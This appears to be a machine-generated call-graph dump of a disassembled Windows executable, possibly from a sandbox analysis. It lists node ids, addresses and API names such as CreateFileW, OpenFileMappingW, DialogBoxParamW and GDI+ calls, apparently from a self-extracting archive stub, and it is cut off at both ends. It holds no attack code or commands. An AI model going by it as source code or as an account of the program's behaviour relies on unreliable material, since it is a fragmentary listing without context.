24484 1ca275 24483->24484 24484->24481 24485 1ca279 GetFileAttributesW 24484->24485 24485->24481 24486->24467 24487->24469 25431 1de455 14 API calls ___delayLoadHelper2@8 25433 1da440 GdipCloneImage GdipAlloc 25434 1e3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25481 1f1f40 CloseHandle 24546 1c9f7a 24547 1c9f8f 24546->24547 24548 1c9f88 24546->24548 24549 1c9f9c GetStdHandle 24547->24549 24556 1c9fab 24547->24556 24549->24556 24550 1ca003 WriteFile 24550->24556 24551 1c9fcf 24552 1c9fd4 WriteFile 24551->24552 24551->24556 24552->24551 24552->24556 24554 1ca095 24558 1c6e98 77 API calls 24554->24558 24556->24548 24556->24550 24556->24551 24556->24552 24556->24554 24557 1c6baa 78 API calls 24556->24557 24557->24556 24558->24548 24559 1c9a74 24562 1c9a7e 24559->24562 24560 1c9b9d SetFilePointer 24561 1c9bb6 GetLastError 24560->24561 24564 1c9ab1 24560->24564 24561->24564 24562->24560 24562->24564 24565 1c9b79 24562->24565 24566 1c981a 24562->24566 24565->24560 24567 1c9833 24566->24567 24569 1c9e80 79 API calls 24567->24569 24568 1c9865 24568->24565 24569->24568 25436 1c1075 84 API calls 25437 1da070 10 API calls 25439 1db270 98 API calls 25484 1c1f72 128 API calls __EH_prolog 25485 1e7f6e 52 API calls 2 library calls 25440 1e8268 55 API calls _free 25441 1dc793 107 API calls 4 library calls 25486 1db18d 78 API calls 25443 1dc793 97 API calls 4 library calls 25445 1dc793 102 API calls 4 library calls 25489 1d9580 6 API calls 25491 1d1bbd GetCPInfo IsDBCSLeadByte 25492 1eb1b8 27 API calls 2 library calls 23503 1de5b1 23504 1de578 23503->23504 23506 1de85d 23504->23506 23532 1de5bb 23506->23532 23508 1de86d 23509 1de8ee 23508->23509 23510 1de8ca 23508->23510 23514 1de966 LoadLibraryExA 23509->23514 23516 1de9c7 23509->23516 23517 1de9d9 23509->23517 23527 1dea95 23509->23527 23511 1de7fb DloadReleaseSectionWriteAccess 6 API calls 23510->23511 23512 1de8d5 RaiseException 23511->23512 23513 1deac3 23512->23513 23513->23504 23515 1de979 GetLastError 23514->23515 23514->23516 23520 1de98c 23515->23520 23521 1de9a2 23515->23521 23516->23517 23519 1de9d2 FreeLibrary 23516->23519 23518 1dea37 GetProcAddress 23517->23518 23517->23527 23523 1dea47 GetLastError 23518->23523 23518->23527 23519->23517 23520->23516 23520->23521 23522 1de7fb DloadReleaseSectionWriteAccess 6 API calls 23521->23522 23524 1de9ad RaiseException 23522->23524 23525 1dea5a 23523->23525 23524->23513 23525->23527 23528 1de7fb DloadReleaseSectionWriteAccess 6 API calls 23525->23528 23541 1de7fb 23527->23541 23529 1dea7b RaiseException 23528->23529 23530 1de5bb ___delayLoadHelper2@8 6 API calls 23529->23530 23531 1dea92 23530->23531 23531->23527 23533 1de5ed 23532->23533 23534 1de5c7 23532->23534 23533->23508 23549 1de664 23534->23549 23536 1de5cc 23537 1de5e8 23536->23537 23552 1de78d 23536->23552 23557 1de5ee GetModuleHandleW GetProcAddress GetProcAddress 23537->23557 23540 1de836 23540->23508 23542 1de80d 23541->23542 23543 1de82f 23541->23543 23544 1de664 DloadReleaseSectionWriteAccess 3 API calls 23542->23544 23543->23513 23545 1de812 23544->23545 23546 1de82a 23545->23546 23547 1de78d DloadProtectSection 3 API calls 23545->23547 23560 1de831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23546->23560 23547->23546 23558 1de5ee GetModuleHandleW GetProcAddress GetProcAddress 23549->23558 23551 1de669 23551->23536 23554 1de7a2 DloadProtectSection 23552->23554 23553 1de7dd VirtualProtect 23555 1de7a8 23553->23555 23554->23553 23554->23555 23559 1de6a3 VirtualQuery GetSystemInfo 23554->23559 23555->23537 23557->23540 23558->23551 23559->23553 23560->23543 25493 1db1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23769 1df3b2 23770 1df3be ___scrt_is_nonwritable_in_current_image 23769->23770 23801 1deed7 23770->23801 23772 1df3c5 23773 1df518 23772->23773 23776 1df3ef 23772->23776 23874 1df838 4 API calls 2 library calls 23773->23874 23775 1df51f 23867 1e7f58 23775->23867 23785 1df42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23776->23785 23812 1e8aed 23776->23812 23783 1df40e 23792 1df48f 23785->23792 23870 1e7af4 38 API calls 3 library calls 23785->23870 23787 1df495 23821 1e8a3e 51 API calls 23787->23821 23789 1df49d 23822 1ddf1e 23789->23822 23820 1df953 GetStartupInfoW __cftof 23792->23820 23795 1df4b1 23795->23775 23796 1df4b5 23795->23796 23797 1df4be 23796->23797 23872 1e7efb 28 API calls _abort 23796->23872 23873 1df048 12 API calls ___scrt_uninitialize_crt 23797->23873 23800 1df4c6 23800->23783 23802 1deee0 23801->23802 23876 1df654 IsProcessorFeaturePresent 23802->23876 23804 1deeec 23877 1e2a5e 23804->23877 23806 1deef1 23807 1deef5 23806->23807 23885 1e8977 23806->23885 23807->23772 23810 1def0c 23810->23772 23815 1e8b04 23812->23815 23813 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23814 1df408 23813->23814 23814->23783 23816 1e8a91 23814->23816 23815->23813 23819 1e8ac0 23816->23819 23817 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23818 1e8ae9 23817->23818 23818->23785 23819->23817 23820->23787 23821->23789 23985 1d0863 23822->23985 23826 1ddf3d 24034 1dac16 23826->24034 23828 1ddf46 __cftof 23829 1ddf59 GetCommandLineW 23828->23829 23830 1ddf68 23829->23830 23831 1ddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23829->23831 24038 1dc5c4 23830->24038 24049 1c4092 23831->24049 23837 1ddf76 OpenFileMappingW 23841 1ddf8f MapViewOfFile 23837->23841 23842 1ddfd6 CloseHandle 23837->23842 23838 1ddfe0 24043 1ddbde 23838->24043 23844 1ddfcd UnmapViewOfFile 23841->23844 23846 1ddfa0 __InternalCxxFrameHandler 23841->23846 23842->23831 23844->23842 23849 1ddbde 2 API calls 23846->23849 23851 1ddfbc 23849->23851 23850 1d90b7 8 API calls 23852 1de0aa DialogBoxParamW 23850->23852 23851->23844 23853 1de0e4 23852->23853 23854 1de0fd 23853->23854 23855 1de0f6 Sleep 23853->23855 23857 1de10b 23854->23857 24082 1dae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23854->24082 23855->23854 23858 1de12a DeleteObject 23857->23858 23859 1de13f DeleteObject 23858->23859 23860 1de146 23858->23860 23859->23860 23861 1de189 23860->23861 23862 1de177 23860->23862 24079 1dac7c 23861->24079 24083 1ddc3b 6 API calls 23862->24083 23864 1de17d CloseHandle 23864->23861 23866 1de1c3 23871 1df993 GetModuleHandleW 23866->23871 24334 1e7cd5 23867->24334 23870->23792 23871->23795 23872->23797 23873->23800 23874->23775 23876->23804 23889 1e3b07 23877->23889 23880 1e2a67 23880->23806 23882 1e2a6f 23883 1e2a7a 23882->23883 23903 1e3b43 DeleteCriticalSection 23882->23903 23883->23806 23932 1ec05a 23885->23932 23888 1e2a7d 7 API calls 2 library calls 23888->23807 23890 1e3b10 23889->23890 23892 1e3b39 23890->23892 23894 1e2a63 23890->23894 23904 1e3d46 23890->23904 23909 1e3b43 DeleteCriticalSection 23892->23909 23894->23880 23895 1e2b8c 23894->23895 23925 1e3c57 23895->23925 23898 1e2ba1 23898->23882 23900 1e2baf 23901 1e2bbc 23900->23901 23931 1e2bbf 6 API calls ___vcrt_FlsFree 23900->23931 23901->23882 23903->23880 23910 1e3c0d 23904->23910 23907 1e3d7e InitializeCriticalSectionAndSpinCount 23908 1e3d69 23907->23908 23908->23890 23909->23894 23911 1e3c26 23910->23911 23912 1e3c4f 23910->23912 23911->23912 23917 1e3b72 23911->23917 23912->23907 23912->23908 23915 1e3c3b GetProcAddress 23915->23912 23916 1e3c49 23915->23916 23916->23912 23922 1e3b7e ___vcrt_FlsSetValue 23917->23922 23918 1e3bf3 23918->23912 23918->23915 23919 1e3b95 LoadLibraryExW 23920 1e3bfa 23919->23920 23921 1e3bb3 GetLastError 23919->23921 23920->23918 23923 1e3c02 FreeLibrary 23920->23923 23921->23922 23922->23918 23922->23919 23924 1e3bd5 LoadLibraryExW 23922->23924 23923->23918 23924->23920 23924->23922 23926 1e3c0d ___vcrt_FlsSetValue 5 API calls 23925->23926 23927 1e3c71 23926->23927 23928 1e3c8a TlsAlloc 23927->23928 23929 1e2b96 23927->23929 23929->23898 23930 1e3d08 6 API calls ___vcrt_FlsSetValue 23929->23930 23930->23900 23931->23898 23935 1ec077 23932->23935 23936 1ec073 23932->23936 23933 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23934 1deefe 23933->23934 23934->23810 23934->23888 23935->23936 23938 1ea6a0 23935->23938 23936->23933 23939 1ea6ac ___scrt_is_nonwritable_in_current_image 23938->23939 23950 1eac31 EnterCriticalSection 23939->23950 23941 1ea6b3 23951 1ec528 23941->23951 23943 1ea6c2 23949 1ea6d1 23943->23949 23964 1ea529 29 API calls 23943->23964 23946 1ea6cc 23965 1ea5df GetStdHandle GetFileType 23946->23965 23948 1ea6e2 _abort 23948->23935 23966 1ea6ed LeaveCriticalSection _abort 23949->23966 23950->23941 23952 1ec534 ___scrt_is_nonwritable_in_current_image 23951->23952 23953 1ec558 23952->23953 23954 1ec541 23952->23954 23967 1eac31 EnterCriticalSection 23953->23967 23975 1e91a8 20 API calls __dosmaperr 23954->23975 23957 1ec546 23976 1e9087 26 API calls __cftof 23957->23976 23959 1ec550 _abort 23959->23943 23960 1ec590 23977 1ec5b7 LeaveCriticalSection _abort 23960->23977 23961 1ec564 23961->23960 23968 1ec479 23961->23968 23964->23946 23965->23949 23966->23948 23967->23961 23969 1eb136 __dosmaperr 20 API calls 23968->23969 23971 1ec48b 23969->23971 23970 1ec498 23972 1e8dcc _free 20 API calls 23970->23972 23971->23970 23978 1eaf0a 23971->23978 23974 1ec4ea 23972->23974 23974->23961 23975->23957 23976->23959 23977->23959 23979 1eac98 __dosmaperr 5 API calls 23978->23979 23980 1eaf31 23979->23980 23981 1eaf4f InitializeCriticalSectionAndSpinCount 23980->23981 23982 1eaf3a 23980->23982 23981->23982 23983 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23982->23983 23984 1eaf66 23983->23984 23984->23971 24084 1dec50 23985->24084 23988 1d0888 GetProcAddress 23991 1d08b9 GetProcAddress 23988->23991 23992 1d08a1 23988->23992 23989 1d08e7 23990 1d0c14 GetModuleFileNameW 23989->23990 24095 1e75fb 42 API calls __vsnwprintf_l 23989->24095 24001 1d0c32 23990->24001 23994 1d08cb 23991->23994 23992->23991 23994->23989 23995 1d0b54 23995->23990 23996 1d0b5f GetModuleFileNameW CreateFileW 23995->23996 23997 1d0b8f SetFilePointer 23996->23997 23998 1d0c08 CloseHandle 23996->23998 23997->23998 23999 1d0b9d ReadFile 23997->23999 23998->23990 23999->23998 24003 1d0bbb 23999->24003 24004 1d0c94 GetFileAttributesW 24001->24004 24006 1d0c5d CompareStringW 24001->24006 24007 1d0cac 24001->24007 24086 1cb146 24001->24086 24089 1d081b 24001->24089 24003->23998 24005 1d081b 2 API calls 24003->24005 24004->24001 24004->24007 24005->24003 24006->24001 24008 1d0cb7 24007->24008 24011 1d0cec 24007->24011 24010 1d0cd0 GetFileAttributesW 24008->24010 24012 1d0ce8 24008->24012 24009 1d0dfb 24033 1da64d GetCurrentDirectoryW 24009->24033 24010->24008 24010->24012 24011->24009 24013 1cb146 GetVersionExW 24011->24013 24012->24011 24014 1d0d06 24013->24014 24015 1d0d0d 24014->24015 24016 1d0d73 24014->24016 24018 1d081b 2 API calls 24015->24018 24017 1c4092 _swprintf 51 API calls 24016->24017 24020 1d0d9b AllocConsole 24017->24020 24019 1d0d17 24018->24019 24021 1d081b 2 API calls 24019->24021 24022 1d0da8 GetCurrentProcessId AttachConsole 24020->24022 24023 1d0df3 ExitProcess 24020->24023 24024 1d0d21 24021->24024 24100 1e3e13 24022->24100 24096 1ce617 24024->24096 24026 1d0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24026->24023 24029 1c4092 _swprintf 51 API calls 24030 1d0d4f 24029->24030 24031 1ce617 53 API calls 24030->24031 24032 1d0d5e 24031->24032 24032->24023 24033->23826 24035 1d081b 2 API calls 24034->24035 24036 1dac2a OleInitialize 24035->24036 24037 1dac4d GdiplusStartup SHGetMalloc 24036->24037 24037->23828 24041 1dc5ce 24038->24041 24039 1dc6e4 24039->23837 24039->23838 24040 1d1fac CharUpperW 24040->24041 24041->24039 24041->24040 24125 1cf3fa 82 API calls 2 library calls 24041->24125 24044 1dec50 24043->24044 24045 1ddbeb SetEnvironmentVariableW 24044->24045 24047 1ddc0e 24045->24047 24046 1ddc36 24046->23831 24047->24046 24048 1ddc2a SetEnvironmentVariableW 24047->24048 24048->24046 24126 1c4065 24049->24126 24052 1db6dd LoadBitmapW 24053 1db6fe 24052->24053 24054 1db70b GetObjectW 24052->24054 24160 1da6c2 FindResourceW 24053->24160 24059 1db71a 24054->24059 24155 1da5c6 24059->24155 24060 1db770 24071 1cda42 24060->24071 24061 1db74c 24176 1da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24061->24176 24062 1da6c2 13 API calls 24064 1db73d 24062->24064 24064->24061 24066 1db743 DeleteObject 24064->24066 24065 1db754 24177 1da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24065->24177 24066->24061 24068 1db75d 24178 1da80c 8 API calls 24068->24178 24070 1db764 DeleteObject 24070->24060 24189 1cda67 24071->24189 24076 1d90b7 24322 1deb38 24076->24322 24080 1dacab GdiplusShutdown CoUninitialize 24079->24080 24080->23866 24082->23857 24083->23864 24085 1d086d GetModuleHandleW 24084->24085 24085->23988 24085->23989 24087 1cb15a GetVersionExW 24086->24087 24088 1cb196 24086->24088 24087->24088 24088->24001 24090 1dec50 24089->24090 24091 1d0828 GetSystemDirectoryW 24090->24091 24092 1d085e 24091->24092 24093 1d0840 24091->24093 24092->24001 24094 1d0851 LoadLibraryW 24093->24094 24094->24092 24095->23995 24097 1ce627 24096->24097 24102 1ce648 24097->24102 24101 1e3e1b 24100->24101 24101->24026 24101->24101 24108 1cd9b0 24102->24108 24105 1ce66b LoadStringW 24106 1ce645 24105->24106 24107 1ce682 LoadStringW 24105->24107 24106->24029 24107->24106 24113 1cd8ec 24108->24113 24110 1cd9cd 24112 1cd9e2 24110->24112 24121 1cd9f0 26 API calls 24110->24121 24112->24105 24112->24106 24114 1cd904 24113->24114 24120 1cd984 _strncpy 24113->24120 24115 1cd928 24114->24115 24122 1d1da7 WideCharToMultiByte 24114->24122 24117 1cd959 24115->24117 24123 1ce5b1 50 API calls __vsnprintf 24115->24123 24124 1e6159 26 API calls 3 library calls 24117->24124 24120->24110 24121->24112 24122->24115 24123->24117 24124->24120 24125->24041 24127 1c407c __vsnwprintf_l 24126->24127 24130 1e5fd4 24127->24130 24133 1e4097 24130->24133 24134 1e40bf 24133->24134 24135 1e40d7 24133->24135 24150 1e91a8 20 API calls __dosmaperr 24134->24150 24135->24134 24137 1e40df 24135->24137 24139 1e4636 __cftof 38 API calls 24137->24139 24138 1e40c4 24151 1e9087 26 API calls __cftof 24138->24151 24141 1e40ef 24139->24141 24152 1e4601 20 API calls 2 library calls 24141->24152 24142 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24144 1c4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24142->24144 24144->24052 24145 1e4167 24153 1e49e6 51 API calls 4 library calls 24145->24153 24148 1e40cf 24148->24142 24149 1e4172 24154 1e46b9 20 API calls _free 24149->24154 24150->24138 24151->24148 24152->24145 24153->24149 24154->24148 24179 1da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24155->24179 24157 1da5cd 24158 1da5d9 24157->24158 24180 1da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24157->24180 24158->24060 24158->24061 24158->24062 24161 1da7d3 24160->24161 24162 1da6e5 SizeofResource 24160->24162 24161->24054 24161->24059 24162->24161 24163 1da6fc LoadResource 24162->24163 24163->24161 24164 1da711 LockResource 24163->24164 24164->24161 24165 1da722 GlobalAlloc 24164->24165 24165->24161 24166 1da73d GlobalLock 24165->24166 24167 1da7cc GlobalFree 24166->24167 24168 1da74c __InternalCxxFrameHandler 24166->24168 24167->24161 24169 1da754 CreateStreamOnHGlobal 24168->24169 24170 1da76c 24169->24170 24171 1da7c5 GlobalUnlock 24169->24171 24181 1da626 GdipAlloc 24170->24181 24171->24167 24174 1da79a GdipCreateHBITMAPFromBitmap 24175 1da7b0 24174->24175 24175->24171 24176->24065 24177->24068 24178->24070 24179->24157 24180->24158 24182 1da638 24181->24182 24184 1da645 24181->24184 24185 1da3b9 24182->24185 24184->24171 24184->24174 24184->24175 24186 1da3da GdipCreateBitmapFromStreamICM 24185->24186 24187 1da3e1 GdipCreateBitmapFromStream 24185->24187 24188 1da3e6 24186->24188 24187->24188 24188->24184 24190 1cda75 __EH_prolog 24189->24190 24191 1cdaa4 GetModuleFileNameW 24190->24191 24192 1cdad5 24190->24192 24193 1cdabe 24191->24193 24235 1c98e0 24192->24235 24193->24192 24195 1cdb31 24246 1e6310 24195->24246 24198 1ce261 78 API calls 24201 1cdb05 24198->24201 24200 1cdb44 24202 1e6310 26 API calls 24200->24202 24201->24195 24201->24198 24214 1cdd4a 24201->24214 24210 1cdb56 ___vcrt_FlsSetValue 24202->24210 24203 1cdc85 24203->24214 24282 1c9d70 81 API calls 24203->24282 24207 1cdc9f ___std_exception_copy 24208 1c9bd0 82 API calls 24207->24208 24207->24214 24211 1cdcc8 ___std_exception_copy 24208->24211 24210->24203 24210->24214 24260 1c9e80 24210->24260 24276 1c9bd0 24210->24276 24281 1c9d70 81 API calls 24210->24281 24213 1cdcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24211->24213 24211->24214 24283 1d1b84 MultiByteToWideChar 24211->24283 24213->24214 24215 1ce159 24213->24215 24230 1d1da7 WideCharToMultiByte 24213->24230 24284 1ce5b1 50 API calls __vsnprintf 24213->24284 24285 1e6159 26 API calls 3 library calls 24213->24285 24286 1e8cce 26 API calls 2 library calls 24213->24286 24287 1e7625 26 API calls 2 library calls 24213->24287 24288 1ce27c 78 API calls 24213->24288 24269 1c959a 24214->24269 24217 1ce1de 24215->24217 24289 1e8cce 26 API calls 2 library calls 24215->24289 24219 1ce214 24217->24219 24222 1ce261 78 API calls 24217->24222 24223 1e6310 26 API calls 24219->24223 24221 1ce1c6 24291 1ce27c 78 API calls 24221->24291 24222->24217 24226 1ce22d 24223->24226 24225 1ce16e 24290 1e7625 26 API calls 2 library calls 24225->24290 24227 1e6310 26 API calls 24226->24227 24227->24214 24230->24213 24233 1ce29e GetModuleHandleW FindResourceW 24234 1cda55 24233->24234 24234->24076 24237 1c98ea 24235->24237 24236 1c994b CreateFileW 24238 1c996c GetLastError 24236->24238 24241 1c99bb 24236->24241 24237->24236 24292 1cbb03 24238->24292 24240 1c998c 24240->24241 24243 1c9990 CreateFileW GetLastError 24240->24243 24242 1c99ff 24241->24242 24244 1c99e5 SetFileTime 24241->24244 24242->24201 24243->24241 24245 1c99b5 24243->24245 24244->24242 24245->24241 24247 1e6349 24246->24247 24248 1e634d 24247->24248 24259 1e6375 24247->24259 24296 1e91a8 20 API calls __dosmaperr 24248->24296 24250 1e6699 24253 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24250->24253 24251 1e6352 24297 1e9087 26 API calls __cftof 24251->24297 24255 1e66a6 24253->24255 24254 1e635d 24256 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24254->24256 24255->24200 24257 1e6369 24256->24257 24257->24200 24259->24250 24298 1e6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24259->24298 24261 1c9ea5 24260->24261 24262 1c9e92 24260->24262 24263 1c9eb0 24261->24263 24265 1c9eb8 SetFilePointer 24261->24265 24262->24263 24299 1c6d5b 77 API calls 24262->24299 24263->24210 24265->24263 24266 1c9ed4 GetLastError 24265->24266 24266->24263 24267 1c9ede 24266->24267 24267->24263 24300 1c6d5b 77 API calls 24267->24300 24270 1c95be 24269->24270 24271 1c95cf 24269->24271 24270->24271 24272 1c95ca 24270->24272 24273 1c95d1 24270->24273 24271->24233 24301 1c974e 24272->24301 24306 1c9620 24273->24306 24277 1c9bdc 24276->24277 24280 1c9be3 24276->24280 24277->24210 24279 1c9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24279->24280 24280->24277 24280->24279 24321 1c6d1a 77 API calls 24280->24321 24281->24210 24282->24207 24283->24213 24284->24213 24285->24213 24286->24213 24287->24213 24288->24213 24289->24225 24290->24221 24291->24217 24293 1cbb10 _wcslen 24292->24293 24294 1cbbb8 GetCurrentDirectoryW 24293->24294 24295 1cbb39 _wcslen 24293->24295 24294->24295 24295->24240 24296->24251 24297->24254 24298->24259 24299->24261 24300->24263 24302 1c9757 24301->24302 24303 1c9781 24301->24303 24302->24303 24312 1ca1e0 24302->24312 24303->24271 24307 1c962c 24306->24307 24308 1c964a 24306->24308 24307->24308 24310 1c9638 CloseHandle 24307->24310 24309 1c9669 24308->24309 24320 1c6bd5 76 API calls 24308->24320 24309->24271 24310->24308 24313 1dec50 24312->24313 24314 1ca1ed DeleteFileW 24313->24314 24315 1c977f 24314->24315 24316 1ca200 24314->24316 24315->24271 24317 1cbb03 GetCurrentDirectoryW 24316->24317 24318 1ca214 24317->24318 24318->24315 24319 1ca218 DeleteFileW 24318->24319 24319->24315 24320->24309 24321->24280 24323 1deb3d ___std_exception_copy 24322->24323 24324 1d90d6 24323->24324 24327 1deb59 24323->24327 24331 1e7a5e 7 API calls 2 library calls 24323->24331 24324->23850 24326 1df5c9 24333 1e238d RaiseException 24326->24333 24327->24326 24332 1e238d RaiseException 24327->24332 24329 1df5e6 24331->24323 24332->24326 24333->24329 24335 1e7ce1 _unexpected 24334->24335 24336 1e7cfa 24335->24336 24337 1e7ce8 24335->24337 24358 1eac31 EnterCriticalSection 24336->24358 24370 1e7e2f GetModuleHandleW 24337->24370 24340 1e7ced 24340->24336 24371 1e7e73 GetModuleHandleExW 24340->24371 24341 1e7d9f 24359 1e7ddf 24341->24359 24345 1e7d76 24350 1e7d8e 24345->24350 24355 1e8a91 _abort 5 API calls 24345->24355 24347 1e7d01 24347->24341 24347->24345 24379 1e87e0 20 API calls _abort 24347->24379 24348 1e7dbc 24362 1e7dee 24348->24362 24349 1e7de8 24380 1f2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24349->24380 24351 1e8a91 _abort 5 API calls 24350->24351 24351->24341 24355->24350 24358->24347 24381 1eac81 LeaveCriticalSection 24359->24381 24361 1e7db8 24361->24348 24361->24349 24382 1eb076 24362->24382 24365 1e7e1c 24368 1e7e73 _abort 8 API calls 24365->24368 24366 1e7dfc GetPEB 24366->24365 24367 1e7e0c GetCurrentProcess TerminateProcess 24366->24367 24367->24365 24369 1e7e24 ExitProcess 24368->24369 24370->24340 24372 1e7e9d GetProcAddress 24371->24372 24373 1e7ec0 24371->24373 24374 1e7eb2 24372->24374 24375 1e7ecf 24373->24375 24376 1e7ec6 FreeLibrary 24373->24376 24374->24373 24377 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24375->24377 24376->24375 24378 1e7cf9 24377->24378 24378->24336 24379->24345 24381->24361 24383 1eb09b 24382->24383 24384 1eb091 24382->24384 24385 1eac98 __dosmaperr 5 API calls 24383->24385 24386 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24384->24386 24385->24384 24387 1e7df8 24386->24387 24387->24365 24387->24366 25496 1c6faa 111 API calls 3 library calls 25497 1deda7 48 API calls _unexpected 25447 1ddca1 DialogBoxParamW 25498 1df3a0 27 API calls 25450 1ea4a0 71 API calls _free 25451 1f08a0 IsProcessorFeaturePresent 25452 1e0ada 51 API calls 2 library calls 24489 1c10d5 24494 1c5abd 24489->24494 24495 1c5ac7 __EH_prolog 24494->24495 24501 1cb505 24495->24501 24497 1c5ad3 24507 1c5cac GetCurrentProcess GetProcessAffinityMask 24497->24507 24502 1cb50f __EH_prolog 24501->24502 24508 1cf1d0 82 API calls 24502->24508 24504 1cb521 24509 1cb61e 24504->24509 24508->24504 24510 1cb630 __cftof 24509->24510 24513 1d10dc 24510->24513 24516 1d109e GetCurrentProcess GetProcessAffinityMask 24513->24516 24517 1cb597 24516->24517 24517->24497 24518 1de2d7 24519 1de1db 24518->24519 24520 1de85d ___delayLoadHelper2@8 14 API calls 24519->24520 24520->24519 24521 1de1d1 14 API calls ___delayLoadHelper2@8 25453 1df4d3 20 API calls 25500 1ea3d0 21 API calls 2 library calls 25501 1f2bd0 VariantClear 25457 1d62ca 123 API calls __InternalCxxFrameHandler 25503 1db5c0 99 API calls 25504 1d77c0 118 API calls 25505 1dffc0 RaiseException _com_error::_com_error CallUnexpected 24532 1ddec2 24533 1ddecf 24532->24533 24534 1ce617 53 API calls 24533->24534 24535 1ddedc 24534->24535 24536 1c4092 _swprintf 51 API calls 24535->24536 24537 1ddef1 SetDlgItemTextW 24536->24537 24540 1db568 PeekMessageW 24537->24540 24541 1db5bc 24540->24541 24542 1db583 GetMessageW 24540->24542 24543 1db599 IsDialogMessageW 24542->24543 24544 1db5a8 TranslateMessage DispatchMessageW 24542->24544 24543->24541 24543->24544 24544->24541 25458 1e2cfb 38 API calls 4 library calls 25460 1c5ef0 82 API calls 25506 1c95f0 80 API calls 25507 1dfd4f 9 API calls 2 library calls 24571 1e98f0 24579 1eadaf 24571->24579 24574 1e9904 24576 1e990c 24577 1e9919 24576->24577 24587 1e9920 11 API calls 24576->24587 24580 1eac98 __dosmaperr 5 API calls 24579->24580 24581 1eadd6 24580->24581 24582 1eadee TlsAlloc 24581->24582 24583 1eaddf 24581->24583 24582->24583 24584 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24583->24584 24585 1e98fa 24584->24585 24585->24574 24586 1e9869 20 API calls 2 library calls 24585->24586 24586->24576 24587->24574 24589 1eabf0 24590 1eabfb 24589->24590 24591 1eaf0a 11 API calls 24590->24591 24592 1eac24 24590->24592 24594 1eac20 24590->24594 24591->24590 24595 1eac50 DeleteCriticalSection 24592->24595 24595->24594 25461 1e88f0 7 API calls ___scrt_uninitialize_crt 25510 1cf1e8 FreeLibrary 24603 1deae7 24604 1deaf1 24603->24604 24605 1de85d ___delayLoadHelper2@8 14 API calls 24604->24605 24606 1deafe 24605->24606 25462 1df4e7 29 API calls _abort 24607 1db7e0 24608 1db7ea __EH_prolog 24607->24608 24775 1c1316 24608->24775 24611 1db841 24612 1dbf0f 24840 1dd69e 24612->24840 24613 1db82a 24613->24611 24615 1db838 24613->24615 24616 1db89b 24613->24616 24619 1db83c 24615->24619 24620 1db878 24615->24620 24618 1db92e GetDlgItemTextW 24616->24618 24624 1db8b1 24616->24624 24618->24620 24623 1db96b 24618->24623 24619->24611 24631 1ce617 53 API calls 24619->24631 24620->24611 24628 1db95f KiUserCallbackDispatcher 24620->24628 24621 1dbf38 24625 1dbf41 SendDlgItemMessageW 24621->24625 24626 1dbf52 GetDlgItem SendMessageW 24621->24626 24622 1dbf2a SendMessageW 24622->24621 24629 1db980 GetDlgItem 24623->24629 24773 1db974 24623->24773 24630 1ce617 53 API calls 24624->24630 24625->24626 24858 1da64d GetCurrentDirectoryW 24626->24858 24628->24611 24633 1db994 SendMessageW SendMessageW 24629->24633 24634 1db9b7 SetFocus 24629->24634 24635 1db8ce SetDlgItemTextW 24630->24635 24636 1db85b 24631->24636 24632 1dbf82 GetDlgItem 24637 1dbf9f 24632->24637 24638 1dbfa5 SetWindowTextW 24632->24638 24633->24634 24639 1db9c7 24634->24639 24650 1db9e0 24634->24650 24640 1db8d9 24635->24640 24878 1c124f SHGetMalloc 24636->24878 24637->24638 24859 1dabab GetClassNameW 24638->24859 24645 1ce617 53 API calls 24639->24645 24640->24611 24648 1db8e6 GetMessageW 24640->24648 24642 1db862 24642->24611 24651 1dc1fc SetDlgItemTextW 24642->24651 24643 1dbe55 24646 1ce617 53 API calls 24643->24646 24649 1db9d1 24645->24649 24652 1dbe65 SetDlgItemTextW 24646->24652 24648->24611 24654 1db8fd IsDialogMessageW 24648->24654 24879 1dd4d4 24649->24879 24659 1ce617 53 API calls 24650->24659 24651->24611 24656 1dbe79 24652->24656 24654->24640 24658 1db90c TranslateMessage DispatchMessageW 24654->24658 24661 1ce617 53 API calls 24656->24661 24658->24640 24660 1dba17 24659->24660 24663 1c4092 _swprintf 51 API calls 24660->24663 24664 1dbe9c _wcslen 24661->24664 24662 1dbff0 24667 1dc020 24662->24667 24670 1ce617 53 API calls 24662->24670 24669 1dba29 24663->24669 24697 1ce617 53 API calls 24664->24697 24720 1dbeed 24664->24720 24665 1dc73f 97 API calls 24665->24662 24666 1db9d9 24785 1ca0b1 24666->24785 24672 1dc73f 97 API calls 24667->24672 24713 1dc0d8 24667->24713 24674 1dd4d4 16 API calls 24669->24674 24675 1dc003 SetDlgItemTextW 24670->24675 24684 1dc03b 24672->24684 24673 1dc18b 24680 1dc194 EnableWindow 24673->24680 24686 1dc19d 24673->24686 24674->24666 24678 1ce617 53 API calls 24675->24678 24676 1dba68 GetLastError 24677 1dba73 24676->24677 